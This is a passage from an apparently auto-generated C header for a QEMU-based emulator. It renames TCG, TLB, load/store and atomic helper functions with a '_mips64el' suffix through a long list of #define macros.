tcg_gen_umin_vec_mips64el #define tcg_gen_smax_vec tcg_gen_smax_vec_mips64el #define tcg_gen_umax_vec tcg_gen_umax_vec_mips64el #define tcg_gen_shlv_vec tcg_gen_shlv_vec_mips64el #define tcg_gen_shrv_vec tcg_gen_shrv_vec_mips64el #define tcg_gen_sarv_vec tcg_gen_sarv_vec_mips64el #define tcg_gen_shls_vec tcg_gen_shls_vec_mips64el #define tcg_gen_shrs_vec tcg_gen_shrs_vec_mips64el #define tcg_gen_sars_vec tcg_gen_sars_vec_mips64el #define tcg_gen_bitsel_vec tcg_gen_bitsel_vec_mips64el #define tcg_gen_cmpsel_vec tcg_gen_cmpsel_vec_mips64el #define tb_htable_lookup tb_htable_lookup_mips64el #define tb_set_jmp_target tb_set_jmp_target_mips64el #define cpu_exec cpu_exec_mips64el #define cpu_loop_exit_noexc cpu_loop_exit_noexc_mips64el #define cpu_reloading_memory_map cpu_reloading_memory_map_mips64el #define cpu_loop_exit cpu_loop_exit_mips64el #define cpu_loop_exit_restore cpu_loop_exit_restore_mips64el #define cpu_loop_exit_atomic cpu_loop_exit_atomic_mips64el #define tlb_init tlb_init_mips64el #define tlb_flush_by_mmuidx tlb_flush_by_mmuidx_mips64el #define tlb_flush tlb_flush_mips64el #define tlb_flush_by_mmuidx_all_cpus tlb_flush_by_mmuidx_all_cpus_mips64el #define tlb_flush_all_cpus tlb_flush_all_cpus_mips64el #define tlb_flush_by_mmuidx_all_cpus_synced tlb_flush_by_mmuidx_all_cpus_synced_mips64el #define tlb_flush_all_cpus_synced tlb_flush_all_cpus_synced_mips64el #define tlb_flush_page_by_mmuidx tlb_flush_page_by_mmuidx_mips64el #define tlb_flush_page tlb_flush_page_mips64el #define tlb_flush_page_by_mmuidx_all_cpus tlb_flush_page_by_mmuidx_all_cpus_mips64el #define tlb_flush_page_all_cpus tlb_flush_page_all_cpus_mips64el #define tlb_flush_page_by_mmuidx_all_cpus_synced tlb_flush_page_by_mmuidx_all_cpus_synced_mips64el #define tlb_flush_page_all_cpus_synced tlb_flush_page_all_cpus_synced_mips64el #define tlb_protect_code tlb_protect_code_mips64el #define tlb_unprotect_code tlb_unprotect_code_mips64el #define tlb_reset_dirty tlb_reset_dirty_mips64el #define tlb_set_dirty tlb_set_dirty_mips64el #define tlb_set_page_with_attrs tlb_set_page_with_attrs_mips64el #define tlb_set_page tlb_set_page_mips64el #define get_page_addr_code_hostp get_page_addr_code_hostp_mips64el #define get_page_addr_code get_page_addr_code_mips64el #define probe_access probe_access_mips64el #define tlb_vaddr_to_host tlb_vaddr_to_host_mips64el #define helper_ret_ldub_mmu helper_ret_ldub_mmu_mips64el #define helper_le_lduw_mmu helper_le_lduw_mmu_mips64el #define helper_be_lduw_mmu helper_be_lduw_mmu_mips64el #define helper_le_ldul_mmu helper_le_ldul_mmu_mips64el #define helper_be_ldul_mmu helper_be_ldul_mmu_mips64el #define helper_le_ldq_mmu helper_le_ldq_mmu_mips64el #define helper_be_ldq_mmu helper_be_ldq_mmu_mips64el #define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_mips64el #define helper_le_ldsw_mmu helper_le_ldsw_mmu_mips64el #define helper_be_ldsw_mmu helper_be_ldsw_mmu_mips64el #define helper_le_ldsl_mmu helper_le_ldsl_mmu_mips64el #define helper_be_ldsl_mmu helper_be_ldsl_mmu_mips64el #define cpu_ldub_mmuidx_ra cpu_ldub_mmuidx_ra_mips64el #define cpu_ldsb_mmuidx_ra cpu_ldsb_mmuidx_ra_mips64el #define cpu_lduw_mmuidx_ra cpu_lduw_mmuidx_ra_mips64el #define cpu_ldsw_mmuidx_ra cpu_ldsw_mmuidx_ra_mips64el #define cpu_ldl_mmuidx_ra cpu_ldl_mmuidx_ra_mips64el #define cpu_ldq_mmuidx_ra cpu_ldq_mmuidx_ra_mips64el #define cpu_ldub_data_ra cpu_ldub_data_ra_mips64el #define cpu_ldsb_data_ra cpu_ldsb_data_ra_mips64el #define cpu_lduw_data_ra cpu_lduw_data_ra_mips64el #define cpu_ldsw_data_ra cpu_ldsw_data_ra_mips64el #define cpu_ldl_data_ra cpu_ldl_data_ra_mips64el #define cpu_ldq_data_ra cpu_ldq_data_ra_mips64el #define cpu_ldub_data cpu_ldub_data_mips64el #define cpu_ldsb_data cpu_ldsb_data_mips64el #define cpu_lduw_data cpu_lduw_data_mips64el #define cpu_ldsw_data cpu_ldsw_data_mips64el #define cpu_ldl_data cpu_ldl_data_mips64el #define cpu_ldq_data cpu_ldq_data_mips64el #define helper_ret_stb_mmu helper_ret_stb_mmu_mips64el #define helper_le_stw_mmu helper_le_stw_mmu_mips64el #define helper_be_stw_mmu helper_be_stw_mmu_mips64el #define helper_le_stl_mmu helper_le_stl_mmu_mips64el #define helper_be_stl_mmu helper_be_stl_mmu_mips64el #define helper_le_stq_mmu helper_le_stq_mmu_mips64el #define helper_be_stq_mmu helper_be_stq_mmu_mips64el #define cpu_stb_mmuidx_ra cpu_stb_mmuidx_ra_mips64el #define cpu_stw_mmuidx_ra cpu_stw_mmuidx_ra_mips64el #define cpu_stl_mmuidx_ra cpu_stl_mmuidx_ra_mips64el #define cpu_stq_mmuidx_ra cpu_stq_mmuidx_ra_mips64el #define cpu_stb_data_ra cpu_stb_data_ra_mips64el #define cpu_stw_data_ra cpu_stw_data_ra_mips64el #define cpu_stl_data_ra cpu_stl_data_ra_mips64el #define cpu_stq_data_ra cpu_stq_data_ra_mips64el #define cpu_stb_data cpu_stb_data_mips64el #define cpu_stw_data cpu_stw_data_mips64el #define cpu_stl_data cpu_stl_data_mips64el #define cpu_stq_data cpu_stq_data_mips64el #define helper_atomic_cmpxchgb_mmu helper_atomic_cmpxchgb_mmu_mips64el #define helper_atomic_xchgb_mmu helper_atomic_xchgb_mmu_mips64el #define helper_atomic_fetch_addb_mmu helper_atomic_fetch_addb_mmu_mips64el #define helper_atomic_fetch_andb_mmu helper_atomic_fetch_andb_mmu_mips64el #define helper_atomic_fetch_orb_mmu helper_atomic_fetch_orb_mmu_mips64el #define helper_atomic_fetch_xorb_mmu helper_atomic_fetch_xorb_mmu_mips64el #define helper_atomic_add_fetchb_mmu helper_atomic_add_fetchb_mmu_mips64el #define helper_atomic_and_fetchb_mmu helper_atomic_and_fetchb_mmu_mips64el #define helper_atomic_or_fetchb_mmu helper_atomic_or_fetchb_mmu_mips64el #define helper_atomic_xor_fetchb_mmu helper_atomic_xor_fetchb_mmu_mips64el #define helper_atomic_fetch_sminb_mmu helper_atomic_fetch_sminb_mmu_mips64el #define helper_atomic_fetch_uminb_mmu helper_atomic_fetch_uminb_mmu_mips64el #define helper_atomic_fetch_smaxb_mmu helper_atomic_fetch_smaxb_mmu_mips64el #define helper_atomic_fetch_umaxb_mmu helper_atomic_fetch_umaxb_mmu_mips64el #define helper_atomic_smin_fetchb_mmu helper_atomic_smin_fetchb_mmu_mips64el #define helper_atomic_umin_fetchb_mmu helper_atomic_umin_fetchb_mmu_mips64el #define helper_atomic_smax_fetchb_mmu helper_atomic_smax_fetchb_mmu_mips64el #define helper_atomic_umax_fetchb_mmu helper_atomic_umax_fetchb_mmu_mips64el #define helper_atomic_cmpxchgw_le_mmu helper_atomic_cmpxchgw_le_mmu_mips64el #define helper_atomic_xchgw_le_mmu helper_atomic_xchgw_le_mmu_mips64el #define helper_atomic_fetch_addw_le_mmu helper_atomic_fetch_addw_le_mmu_mips64el #define helper_atomic_fetch_andw_le_mmu helper_atomic_fetch_andw_le_mmu_mips64el #define helper_atomic_fetch_orw_le_mmu helper_atomic_fetch_orw_le_mmu_mips64el #define helper_atomic_fetch_xorw_le_mmu helper_atomic_fetch_xorw_le_mmu_mips64el #define helper_atomic_add_fetchw_le_mmu helper_atomic_add_fetchw_le_mmu_mips64el #define helper_atomic_and_fetchw_le_mmu helper_atomic_and_fetchw_le_mmu_mips64el #define helper_atomic_or_fetchw_le_mmu helper_atomic_or_fetchw_le_mmu_mips64el #define helper_atomic_xor_fetchw_le_mmu helper_atomic_xor_fetchw_le_mmu_mips64el #define helper_atomic_fetch_sminw_le_mmu helper_atomic_fetch_sminw_le_mmu_mips64el #define helper_atomic_fetch_uminw_le_mmu helper_atomic_fetch_uminw_le_mmu_mips64el #define helper_atomic_fetch_smaxw_le_mmu helper_atomic_fetch_smaxw_le_mmu_mips64el #define helper_atomic_fetch_umaxw_le_mmu helper_atomic_fetch_umaxw_le_mmu_mips64el #define helper_atomic_smin_fetchw_le_mmu helper_atomic_smin_fetchw_le_mmu_mips64el #define helper_atomic_umin_fetchw_le_mmu helper_atomic_umin_fetchw_le_mmu_mips64el #define helper_atomic_smax_fetchw_le_mmu helper_atomic_smax_fetchw_le_mmu_mips64el #define helper_atomic_umax_fetchw_le_mmu helper_atomic_umax_fetchw_le_mmu_mips64el #define helper_atomic_cmpxchgw_be_mmu helper_atomic_cmpxchgw_be_mmu_mips64el #define helper_atomic_xchgw_be_mmu helper_atomic_xchgw_be_mmu_mips64el #define helper_atomic_fetch_andw_be_mmu helper_atomic_fetch_andw_be_mmu_mips64el #define helper_atomic_fetch_orw_be_mmu helper_atomic_fetch_orw_be_mmu_mips64el #define helper_atomic_fetch_xorw_be_mmu helper_atomic_fetch_xorw_be_mmu_mips64el #define helper_atomic_and_fetchw_be_mmu helper_atomic_and_fetchw_be_mmu_mips64el #define helper_atomic_or_fetchw_be_mmu helper_atomic_or_fetchw_be_mmu_mips64el #define helper_atomic_xor_fetchw_be_mmu helper_atomic_xor_fetchw_be_mmu_mips64el #define helper_atomic_fetch_sminw_be_mmu helper_atomic_fetch_sminw_be_mmu_mips64el #define helper_atomic_fetch_uminw_be_mmu helper_atomic_fetch_uminw_be_mmu_mips64el #define helper_atomic_fetch_smaxw_be_mmu helper_atomic_fetch_smaxw_be_mmu_mips64el #define helper_atomic_fetch_umaxw_be_mmu helper_atomic_fetch_umaxw_be_mmu_mips64el #define helper_atomic_smin_fetchw_be_mmu helper_atomic_smin_fetchw_be_mmu_mips64el #define helper_atomic_umin_fetchw_be_mmu helper_atomic_umin_fetchw_be_mmu_mips64el #define helper_atomic_smax_fetchw_be_mmu helper_atomic_smax_fetchw_be_mmu_mips64el #define helper_atomic_umax_fetchw_be_mmu helper_atomic_umax_fetchw_be_mmu_mips64el #define helper_atomic_fetch_addw_be_mmu helper_atomic_fetch_addw_be_mmu_mips64el #define helper_atomic_add_fetchw_be_mmu helper_atomic_add_fetchw_be_mmu_mips64el #define helper_atomic_cmpxchgl_le_mmu helper_atomic_cmpxchgl_le_mmu_mips64el #define helper_atomic_xchgl_le_mmu helper_atomic_xchgl_le_mmu_mips64el #define helper_atomic_fetch_addl_le_mmu helper_atomic_fetch_addl_le_mmu_mips64el #define helper_atomic_fetch_andl_le_mmu helper_atomic_fetch_andl_le_mmu_mips64el #define helper_atomic_fetch_orl_le_mmu helper_atomic_fetch_orl_le_mmu_mips64el #define helper_atomic_fetch_xorl_le_mmu helper_atomic_fetch_xorl_le_mmu_mips64el #define helper_atomic_add_fetchl_le_mmu helper_atomic_add_fetchl_le_mmu_mips64el #define helper_atomic_and_fetchl_le_mmu helper_atomic_and_fetchl_le_mmu_mips64el #define helper_atomic_or_fetchl_le_mmu helper_atomic_or_fetchl_le_mmu_mips64el #define helper_atomic_xor_fetchl_le_mmu helper_atomic_xor_fetchl_le_mmu_mips64el #define helper_atomic_fetch_sminl_le_mmu helper_atomic_fetch_sminl_le_mmu_mips64el #define helper_atomic_fetch_uminl_le_mmu helper_atomic_fetch_uminl_le_mmu_mips64el #define helper_atomic_fetch_smaxl_le_mmu helper_atomic_fetch_smaxl_le_mmu_mips64el #define helper_atomic_fetch_umaxl_le_mmu helper_atomic_fetch_umaxl_le_mmu_mips64el #define helper_atomic_smin_fetchl_le_mmu helper_atomic_smin_fetchl_le_mmu_mips64el #define helper_atomic_umin_fetchl_le_mmu helper_atomic_umin_fetchl_le_mmu_mips64el #define helper_atomic_smax_fetchl_le_mmu helper_atomic_smax_fetchl_le_mmu_mips64el #define helper_atomic_umax_fetchl_le_mmu helper_atomic_umax_fetchl_le_mmu_mips64el #define helper_atomic_cmpxchgl_be_mmu helper_atomic_cmpxchgl_be_mmu_mips64el #define helper_atomic_xchgl_be_mmu helper_atomic_xchgl_be_mmu_mips64el #define helper_atomic_fetch_andl_be_mmu helper_atomic_fetch_andl_be_mmu_mips64el #define helper_atomic_fetch_orl_be_mmu helper_atomic_fetch_orl_be_mmu_mips64el #define helper_atomic_fetch_xorl_be_mmu helper_atomic_fetch_xorl_be_mmu_mips64el #define helper_atomic_and_fetchl_be_mmu helper_atomic_and_fetchl_be_mmu_mips64el #define helper_atomic_or_fetchl_be_mmu helper_atomic_or_fetchl_be_mmu_mips64el #define helper_atomic_xor_fetchl_be_mmu helper_atomic_xor_fetchl_be_mmu_mips64el #define helper_atomic_fetch_sminl_be_mmu helper_atomic_fetch_sminl_be_mmu_mips64el #define helper_atomic_fetch_uminl_be_mmu helper_atomic_fetch_uminl_be_mmu_mips64el #define helper_atomic_fetch_smaxl_be_mmu helper_atomic_fetch_smaxl_be_mmu_mips64el #define helper_atomic_fetch_umaxl_be_mmu helper_atomic_fetch_umaxl_be_mmu_mips64el #define helper_atomic_smin_fetchl_be_mmu helper_atomic_smin_fetchl_be_mmu_mips64el #define helper_atomic_umin_fetchl_be_mmu helper_atomic_umin_fetchl_be_mmu_mips64el #define helper_atomic_smax_fetchl_be_mmu helper_atomic_smax_fetchl_be_mmu_mips64el #define helper_atomic_umax_fetchl_be_mmu helper_atomic_umax_fetchl_be_mmu_mips64el #define helper_atomic_fetch_addl_be_mmu helper_atomic_fetch_addl_be_mmu_mips64el #define helper_atomic_add_fetchl_be_mmu helper_atomic_add_fetchl_be_mmu_mips64el #define helper_atomic_cmpxchgq_le_mmu helper_atomic_cmpxchgq_le_mmu_mips64el #define helper_atomic_xchgq_le_mmu helper_atomic_xchgq_le_mmu_mips64el #define helper_atomic_fetch_addq_le_mmu helper_atomic_fetch_addq_le_mmu_mips64el #define helper_atomic_fetch_andq_le_mmu helper_atomic_fetch_andq_le_mmu_mips64el #define helper_atomic_fetch_orq_le_mmu helper_atomic_fetch_orq_le_mmu_mips64el #define helper_atomic_fetch_xorq_le_mmu helper_atomic_fetch_xorq_le_mmu_mips64el #define helper_atomic_add_fetchq_le_mmu helper_atomic_add_fetchq_le_mmu_mips64el #define helper_atomic_and_fetchq_le_mmu helper_atomic_and_fetchq_le_mmu_mips64el #define helper_atomic_or_fetchq_le_mmu helper_atomic_or_fetchq_le_mmu_mips64el #define helper_atomic_xor_fetchq_le_mmu helper_atomic_xor_fetchq_le_mmu_mips64el #define helper_atomic_fetch_sminq_le_mmu helper_atomic_fetch_sminq_le_mmu_mips64el #define helper_atomic_fetch_uminq_le_mmu helper_atomic_fetch_uminq_le_mmu_mips64el #define helper_atomic_fetch_smaxq_le_mmu helper_atomic_fetch_smaxq_le_mmu_mips64el #define helper_atomic_fetch_umaxq_le_mmu helper_atomic_fetch_umaxq_le_mmu_mips64el #define helper_atomic_smin_fetchq_le_mmu helper_atomic_smin_fetchq_le_mmu_mips64el #define helper_atomic_umin_fetchq_le_mmu helper_atomic_umin_fetchq_le_mmu_mips64el #define helper_atomic_smax_fetchq_le_mmu helper_atomic_smax_fetchq_le_mmu_mips64el #define helper_atomic_umax_fetchq_le_mmu helper_atomic_umax_fetchq_le_mmu_mips64el #define helper_atomic_cmpxchgq_be_mmu helper_atomic_cmpxchgq_be_mmu_mips64el #define helper_atomic_xchgq_be_mmu helper_atomic_xchgq_be_mmu_mips64el #define helper_atomic_fetch_andq_be_mmu helper_atomic_fetch_andq_be_mmu_mips64el #define helper_atomic_fetch_orq_be_mmu helper_atomic_fetch_orq_be_mmu_mips64el #define helper_atomic_fetch_xorq_be_mmu helper_atomic_fetch_xorq_be_mmu_mips64el #define helper_atomic_and_fetchq_be_mmu helper_atomic_and_fetchq_be_mmu_mips64el #define helper_atomic_or_fetchq_be_mmu helper_atomic_or_fetchq_be_mmu_mips64el #define helper_atomic_xor_fetchq_be_mmu helper_atomic_xor_fetchq_be_mmu_mips64el #define helper_atomic_fetch_sminq_be_mmu helper_atomic_fetch_sminq_be_mmu_mips64el #define helper_atomic_fetch_uminq_be_mmu helper_atomic_fetch_uminq_be_mmu_mips64el #define helper_atomic_fetch_smaxq_be_mmu helper_atomic_fetch_smaxq_be_mmu_mips64el #define helper_atomic_fetch_umaxq_be_mmu helper_atomic_fetch_umaxq_be_mmu_mips64el #define helper_atomic_smin_fetchq_be_mmu helper_atomic_smin_fetchq_be_mmu_mips64el #define helper_atomic_umin_fetchq_be_mmu helper_atomic_umin_fetchq_be_mmu_mips64el #define helper_atomic_smax_fetchq_be_mmu helper_atomic_smax_fetchq_be_mmu_mips64el #define helper_atomic_umax_fetchq_be_mmu helper_atomic_umax_fetchq_be_mmu_mips64el #define helper_atomic_fetch_addq_be_mmu helper_atomic_fetch_addq_be_mmu_mips64el #define helper_atomic_add_fetchq_be_mmu helper_atomic_add_fetchq_be_mmu_mips64el #define helper_atomic_cmpxchgb helper_atomic_cmpxchgb_mips64el #define helper_atomic_xchgb helper_atomic_xchgb_mips64el #define helper_atomic_fetch_addb helper_atomic_fetch_addb_mips64el #define helper_atomic_fetch_andb helper_atomic_fetch_andb_mips64el #define helper_atomic_fetch_orb helper_atomic_fetch_orb_mips64el #define helper_atomic_fetch_xorb helper_atomic_fetch_xorb_mips64el #define helper_atomic_add_fetchb helper_atomic_add_fetchb_mips64el #define helper_atomic_and_fetchb helper_atomic_and_fetchb_mips64el #define helper_atomic_or_fetchb helper_atomic_or_fetchb_mips64el #define helper_atomic_xor_fetchb helper_atomic_xor_fetchb_mips64el #define helper_atomic_fetch_sminb helper_atomic_fetch_sminb_mips64el #define helper_atomic_fetch_uminb helper_atomic_fetch_uminb_mips64el #define helper_atomic_fetch_smaxb helper_atomic_fetch_smaxb_mips64el #define helper_atomic_fetch_umaxb helper_atomic_fetch_umaxb_mips64el #define helper_atomic_smin_fetchb helper_atomic_smin_fetchb_mips64el #define helper_atomic_umin_fetchb helper_atomic_umin_fetchb_mips64el #define helper_atomic_smax_fetchb helper_atomic_smax_fetchb_mips64el #define helper_atomic_umax_fetchb helper_atomic_umax_fetchb_mips64el #define helper_atomic_cmpxchgw_le helper_atomic_cmpxchgw_le_mips64el #define helper_atomic_xchgw_le helper_atomic_xchgw_le_mips64el #define helper_atomic_fetch_addw_le helper_atomic_fetch_addw_le_mips64el #define helper_atomic_fetch_andw_le helper_atomic_fetch_andw_le_mips64el #define helper_atomic_fetch_orw_le helper_atomic_fetch_orw_le_mips64el #define helper_atomic_fetch_xorw_le helper_atomic_fetch_xorw_le_mips64el #define helper_atomic_add_fetchw_le helper_atomic_add_fetchw_le_mips64el #define helper_atomic_and_fetchw_le helper_atomic_and_fetchw_le_mips64el #define helper_atomic_or_fetchw_le helper_atomic_or_fetchw_le_mips64el #define helper_atomic_xor_fetchw_le helper_atomic_xor_fetchw_le_mips64el #define helper_atomic_fetch_sminw_le helper_atomic_fetch_sminw_le_mips64el #define helper_atomic_fetch_uminw_le helper_atomic_fetch_uminw_le_mips64el #define helper_atomic_fetch_smaxw_le helper_atomic_fetch_smaxw_le_mips64el #define helper_atomic_fetch_umaxw_le helper_atomic_fetch_umaxw_le_mips64el #define helper_atomic_smin_fetchw_le helper_atomic_smin_fetchw_le_mips64el #define helper_atomic_umin_fetchw_le helper_atomic_umin_fetchw_le_mips64el #define helper_atomic_smax_fetchw_le helper_atomic_smax_fetchw_le_mips64el #define helper_atomic_umax_fetchw_le helper_atomic_umax_fetchw_le_mips64el #define helper_atomic_cmpxchgw_be helper_atomic_cmpxchgw_be_mips64el #define helper_atomic_xchgw_be helper_atomic_xchgw_be_mips64el #define helper_atomic_fetch_andw_be helper_atomic_fetch_andw_be_mips64el #define helper_atomic_fetch_orw_be helper_atomic_fetch_orw_be_mips64el #define helper_atomic_fetch_xorw_be helper_atomic_fetch_xorw_be_mips64el #define helper_atomic_and_fetchw_be helper_atomic_and_fetchw_be_mips64el #define helper_atomic_or_fetchw_be helper_atomic_or_fetchw_be_mips64el #define helper_atomic_xor_fetchw_be helper_atomic_xor_fetchw_be_mips64el #define helper_atomic_fetch_sminw_be helper_atomic_fetch_sminw_be_mips64el #define helper_atomic_fetch_uminw_be helper_atomic_fetch_uminw_be_mips64el #define helper_atomic_fetch_smaxw_be helper_atomic_fetch_smaxw_be_mips64el #define helper_atomic_fetch_umaxw_be helper_atomic_fetch_umaxw_be_mips64el #define helper_atomic_smin_fetchw_be helper_atomic_smin_fetchw_be_mips64el #define helper_atomic_umin_fetchw_be helper_atomic_umin_fetchw_be_mips64el #define helper_atomic_smax_fetchw_be helper_atomic_smax_fetchw_be_mips64el #define helper_atomic_umax_fetchw_be helper_atomic_umax_fetchw_be_mips64el #define helper_atomic_fetch_addw_be helper_atomic_fetch_addw_be_mips64el #define helper_atomic_add_fetchw_be helper_atomic_add_fetchw_be_mips64el #define helper_atomic_cmpxchgl_le helper_atomic_cmpxchgl_le_mips64el #define helper_atomic_xchgl_le helper_atomic_xchgl_le_mips64el #define helper_atomic_fetch_addl_le helper_atomic_fetch_addl_le_mips64el #define helper_atomic_fetch_andl_le helper_atomic_fetch_andl_le_mips64el #define helper_atomic_fetch_orl_le helper_atomic_fetch_orl_le_mips64el #define helper_atomic_fetch_xorl_le helper_atomic_fetch_xorl_le_mips64el #define helper_atomic_add_fetchl_le helper_atomic_add_fetchl_le_mips64el #define helper_atomic_and_fetchl_le helper_atomic_and_fetchl_le_mips64el #define helper_atomic_or_fetchl_le helper_atomic_or_fetchl_le_mips64el #define helper_atomic_xor_fetchl_le helper_atomic_xor_fetchl_le_mips64el #define helper_atomic_fetch_sminl_le helper_atomic_fetch_sminl_le_mips64el #define helper_atomic_fetch_uminl_le helper_atomic_fetch_uminl_le_mips64el #define helper_atomic_fetch_smaxl_le helper_atomic_fetch_smaxl_le_mips64el #define helper_atomic_fetch_umaxl_le helper_atomic_fetch_umaxl_le_mips64el #define helper_atomic_smin_fetchl_le helper_atomic_smin_fetchl_le_mips64el #define helper_atomic_umin_fetchl_le helper_atomic_umin_fetchl_le_mips64el #define helper_atomic_smax_fetchl_le helper_atomic_smax_fetchl_le_mips64el #define helper_atomic_umax_fetchl_le helper_atomic_umax_fetchl_le_mips64el #define helper_atomic_cmpxchgl_be helper_atomic_cmpxchgl_be_mips64el #define helper_atomic_xchgl_be helper_atomic_xchgl_be_mips64el #define helper_atomic_fetch_andl_be helper_atomic_fetch_andl_be_mips64el #define helper_atomic_fetch_orl_be helper_atomic_fetch_orl_be_mips64el #define helper_atomic_fetch_xorl_be helper_atomic_fetch_xorl_be_mips64el #define helper_atomic_and_fetchl_be helper_atomic_and_fetchl_be_mips64el #define helper_atomic_or_fetchl_be helper_atomic_or_fetchl_be_mips64el #define helper_atomic_xor_fetchl_be helper_atomic_xor_fetchl_be_mips64el #define helper_atomic_fetch_sminl_be helper_atomic_fetch_sminl_be_mips64el #define helper_atomic_fetch_uminl_be helper_atomic_fetch_uminl_be_mips64el #define helper_atomic_fetch_smaxl_be helper_atomic_fetch_smaxl_be_mips64el #define helper_atomic_fetch_umaxl_be helper_atomic_fetch_umaxl_be_mips64el #define helper_atomic_smin_fetchl_be helper_atomic_smin_fetchl_be_mips64el #define helper_atomic_umin_fetchl_be helper_atomic_umin_fetchl_be_mips64el #define helper_atomic_smax_fetchl_be helper_atomic_smax_fetchl_be_mips64el #define helper_atomic_umax_fetchl_be helper_atomic_umax_fetchl_be_mips64el #define helper_atomic_fetch_addl_be helper_atomic_fetch_addl_be_mips64el #define helper_atomic_add_fetchl_be helper_atomic_add_fetchl_be_mips64el #define helper_atomic_cmpxchgq_le helper_atomic_cmpxchgq_le_mips64el #define helper_atomic_xchgq_le helper_atomic_xchgq_le_mips64el #define helper_atomic_fetch_addq_le helper_atomic_fetch_addq_le_mips64el #define helper_atomic_fetch_andq_le helper_atomic_fetch_andq_le_mips64el #define helper_atomic_fetch_orq_le helper_atomic_fetch_orq_le_mips64el #define helper_atomic_fetch_xorq_le helper_atomic_fetch_xorq_le_mips64el #define helper_atomic_add_fetchq_le helper_atomic_add_fetchq_le_mips64el #define helper_atomic_and_fetchq_le helper_atomic_and_fetchq_le_mips64el #define helper_atomic_or_fetchq_le helper_atomic_or_fetchq_le_mips64el #define helper_atomic_xor_fetchq_le helper_atomic_xor_fetchq_le_mips64el #define helper_atomic_fetch_sminq_le helper_atomic_fetch_sminq_le_mips64el #define helper_atomic_fetch_uminq_le helper_atomic_fetch_uminq_le_mips64el #define helper_atomic_fetch_smaxq_le helper_atomic_fetch_smaxq_le_mips64el #define helper_atomic_fetch_umaxq_le helper_atomic_fetch_umaxq_le_mips64el #define helper_atomic_smin_fetchq_le helper_atomic_smin_fetchq_le_mips64el #define helper_atomic_umin_fetchq_le helper_atomic_umin_fetchq_le_mips64el #define helper_atomic_smax_fetchq_le helper_atomic_smax_fetchq_le_mips64el #define helper_atomic_umax_fetchq_le helper_atomic_umax_fetchq_le_mips64el #define helper_atomic_cmpxchgq_be helper_atomic_cmpxchgq_be_mips64el #define helper_atomic_xchgq_be helper_atomic_xchgq_be_mips64el #define helper_atomic_fetch_andq_be helper_atomic_fetch_andq_be_mips64el #define helper_atomic_fetch_orq_be helper_atomic_fetch_orq_be_mips64el #define helper_atomic_fetch_xorq_be helper_atomic_fetch_xorq_be_mips64el #define helper_atomic_and_fetchq_be helper_atomic_and_fetchq_be_mips64el #define helper_atomic_or_fetchq_be helper_atomic_or_fetchq_be_mips64el #define helper_atomic_xor_fetchq_be helper_atomic_xor_fetchq_be_mips64el #define helper_atomic_fetch_sminq_be helper_atomic_fetch_sminq_be_mips64el #define helper_atomic_fetch_uminq_be helper_atomic_fetch_uminq_be_mips64el #define helper_atomic_fetch_smaxq_be helper_atomic_fetch_smaxq_be_mips64el #define helper_atomic_fetch_umaxq_be helper_atomic_fetch_umaxq_be_mips64el #define helper_atomic_smin_fetchq_be helper_atomic_smin_fetchq_be_mips64el #define helper_atomic_umin_fetchq_be helper_atomic_umin_fetchq_be_mips64el #define helper_atomic_smax_fetchq_be helper_atomic_smax_fetchq_be_mips64el #define helper_atomic_umax_fetchq_be helper_atomic_umax_fetchq_be_mips64el #define helper_atomic_fetch_addq_be helper_atomic_fetch_addq_be_mips64el #define helper_atomic_add_fetchq_be helper_atomic_add_fetchq_be_mips64el #define cpu_ldub_code cpu_ldub_code_mips64el #define cpu_lduw_code cpu_lduw_code_mips64el #define cpu_ldl_code cpu_ldl_code_mips64el #define cpu_ldq_code cpu_ldq_code_mips64el #define helper_div_i32 helper_div_i32_mips64el #define helper_rem_i32 helper_rem_i32_mips64el #define helper_divu_i32 helper_divu_i32_mips64el #define helper_remu_i32 helper_remu_i32_mips64el #define helper_shl_i64 helper_shl_i64_mips64el #define helper_shr_i64 helper_shr_i64_mips64el #define helper_sar_i64 helper_sar_i64_mips64el #define helper_div_i64 helper_div_i64_mips64el #define helper_rem_i64 helper_rem_i64_mips64el #define helper_divu_i64 helper_divu_i64_mips64el #define helper_remu_i64 helper_remu_i64_mips64el #define helper_muluh_i64 helper_muluh_i64_mips64el #define helper_mulsh_i64 helper_mulsh_i64_mips64el #define helper_clz_i32 helper_clz_i32_mips64el #define helper_ctz_i32 helper_ctz_i32_mips64el #define helper_clz_i64 helper_clz_i64_mips64el #define helper_ctz_i64 helper_ctz_i64_mips64el #define helper_clrsb_i32 helper_clrsb_i32_mips64el #define helper_clrsb_i64 helper_clrsb_i64_mips64el #define helper_ctpop_i32 helper_ctpop_i32_mips64el #define helper_ctpop_i64 helper_ctpop_i64_mips64el #define helper_lookup_tb_ptr helper_lookup_tb_ptr_mips64el #define helper_exit_atomic helper_exit_atomic_mips64el #define helper_gvec_add8 helper_gvec_add8_mips64el #define helper_gvec_add16 helper_gvec_add16_mips64el #define helper_gvec_add32 helper_gvec_add32_mips64el #define helper_gvec_add64 helper_gvec_add64_mips64el #define helper_gvec_adds8 helper_gvec_adds8_mips64el #define helper_gvec_adds16 helper_gvec_adds16_mips64el #define helper_gvec_adds32 helper_gvec_adds32_mips64el #define helper_gvec_adds64 helper_gvec_adds64_mips64el #define helper_gvec_sub8 helper_gvec_sub8_mips64el #define helper_gvec_sub16 helper_gvec_sub16_mips64el #define helper_gvec_sub32 helper_gvec_sub32_mips64el #define helper_gvec_sub64 helper_gvec_sub64_mips64el #define helper_gvec_subs8 helper_gvec_subs8_mips64el #define helper_gvec_subs16 helper_gvec_subs16_mips64el #define helper_gvec_subs32 helper_gvec_subs32_mips64el #define helper_gvec_subs64 helper_gvec_subs64_mips64el #define helper_gvec_mul8 helper_gvec_mul8_mips64el #define helper_gvec_mul16 helper_gvec_mul16_mips64el #define helper_gvec_mul32 helper_gvec_mul32_mips64el #define helper_gvec_mul64 helper_gvec_mul64_mips64el #define helper_gvec_muls8 helper_gvec_muls8_mips64el #define helper_gvec_muls16 helper_gvec_muls16_mips64el #define helper_gvec_muls32 helper_gvec_muls32_mips64el #define helper_gvec_muls64 helper_gvec_muls64_mips64el #define helper_gvec_neg8 helper_gvec_neg8_mips64el #define helper_gvec_neg16 helper_gvec_neg16_mips64el #define helper_gvec_neg32 helper_gvec_neg32_mips64el #define helper_gvec_neg64 helper_gvec_neg64_mips64el #define helper_gvec_abs8 helper_gvec_abs8_mips64el #define helper_gvec_abs16 helper_gvec_abs16_mips64el #define helper_gvec_abs32 helper_gvec_abs32_mips64el #define helper_gvec_abs64 helper_gvec_abs64_mips64el #define helper_gvec_mov helper_gvec_mov_mips64el #define helper_gvec_dup64 helper_gvec_dup64_mips64el #define helper_gvec_dup32 helper_gvec_dup32_mips64el #define 